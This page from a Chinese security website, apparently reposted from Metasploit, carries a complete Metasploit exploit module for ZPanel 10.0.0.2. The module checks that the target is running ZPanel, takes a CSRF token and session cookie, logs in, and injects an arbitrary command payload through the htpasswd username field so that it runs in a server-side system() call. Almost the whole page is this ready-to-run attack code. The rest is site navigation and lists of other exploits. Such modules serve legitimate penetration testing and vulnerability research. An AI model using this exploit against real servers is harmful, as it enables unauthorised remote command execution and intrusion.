首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZPanel 10.0.0.2 htpasswd Module Username Command Execution
来源:metasploit.com 作者:sinn3r 发布时间:2013-06-24  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "ZPanel 10.0.0.2 htpasswd Module Username Command Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in ZPanel's htpasswd module. When
        creating .htaccess using the htpasswd module, the username field can be used to
        inject system commands, which is passed on to a system() function for executing
        the system's htpasswd's command.
  
        Please note: In order to use this module, you must have a valid account to login
        to ZPanel.  An account part of any of the default groups should suffice, such as:
        Administrators, Resellers, or Users (Clients).  By default, there's already a
        'zadmin' user, but the password is randomly generated.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'shachibista'# Original discovery
          'sinn3r'        # Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '94038'],
        ],
      'Arch'           => ARCH_CMD,
      'Platform'       => 'unix',
      'Targets'        =>
        [
          [ 'ZPanel 10.0.0.2 on Linux', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 7 2013",
      'DefaultTarget'  => 0))
  
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to ZPanel', '/']),
        OptString.new('USERNAME', [true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ], self.class)
  end
  
  
  def peer
    "#{rhost}:#{rport}"
  end
  
  
  def check
    res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
    if not res
      print_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end
  
    if res.body =~ /This server is running: ZPanel/
      return Exploit::CheckCode::Detected
    end
  
    return Exploit::CheckCode::Safe
  end
  
  
  def login(base, token, cookie)
    res  = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(base, 'index.php'),
      'cookie'    => cookie,
      'vars_post' => {
        'inUsername' => datastore['USERNAME'],
        'inPassword' => datastore['PASSWORD'],
        'sublogin2'  => 'LogIn',
        'csfr_token' => token
      }
    })
  
    if not res
      fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out")
    elsif res.body =~ /Application Error/ or res.headers['location'].to_s =~ /invalidlogin/
      fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
    end
  
    res.headers['Set-Cookie'].to_s.scan(/(zUserSaltCookie=[a-z0-9]+)/).flatten[0] || ''
  end
  
  
  def get_csfr_info(base, path='index.php', cookie='', vars={})
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(base),
      'cookie'   => cookie,
      'vars_get' => vars
    })
  
    fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out while collecting CSFR token") if not res
  
    token = res.body.scan(/<input type="hidden" name="csfr_token" value="(.+)">/).flatten[0] || ''
    sid   = res.headers['Set-Cookie'].to_s.scan(/(PHPSESSID=[a-z0-9]+)/).flatten[0] || ''
    fail_with(Exploit::Failure::Unknown, "#{peer} - No CSFR token collected") if token.empty?
  
    return token, sid
  end
  
  
  def exec(base, token, sid, user_salt_cookie)
    fake_pass = Rex::Text.rand_text_alpha(5)
    cookie    = "#{sid}; #{user_salt_cookie}"
  
    send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(base),
      'cookie'   => cookie,
      'vars_get' => {
        'module' => 'htpasswd',
        'action' => 'CreateHTA'
      },
      'vars_post' => {
        'inAuthName'          => 'Restricted+Area',
        'inHTUsername'        => ";#{payload.encoded} #",
        'inHTPassword'        => fake_pass,
        'inConfirmHTPassword' => fake_pass,
        'inPath'              => '/',
        'csfr_token'          => token
      }
    })
  end
  
  
  def exploit
    base = target_uri.path
  
    token, sid = get_csfr_info(base)
    vprint_status("#{peer} - Token=#{token}, SID=#{sid}")
  
    user_salt_cookie = login(base, token, sid)
    print_good("#{peer} - Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
  
    vars = {'module'=>'htpasswd', 'selected'=>'Selected', 'path'=>'/'}
    cookie = "#{sid}; #{user_salt_cookie}"
    token = get_csfr_info(base, '', cookie, vars)[0]
    vprint_status("#{peer} - Token=#{token}, SID=#{sid}")
  
  
    print_status("#{peer} - Executing payload...")
    exec(base, token, sid, user_salt_cookie)
  end
  
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Novell Client 4.91 SP4 nwfs.sy
·Sami FTP Server 2.0.1 RETR Den
·MediaCoder PMP Edition 0.8.17
·Seowonintech Remote Root Explo
·Mediacoder .lst SEH Buffer Ove
·LibrettoCMS File Manager Arbit
·Mediacoder .m3u SEH Buffer Ove
·HP System Management Homepage
·ASC Timetables 2013 - Stack Bu
·Mozilla Firefox 21.0 Denial Of
·FreeBSD 9.0 / 9.1 mmap/ptrace
·FreeBSD 9.0+ Privilege Escalat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved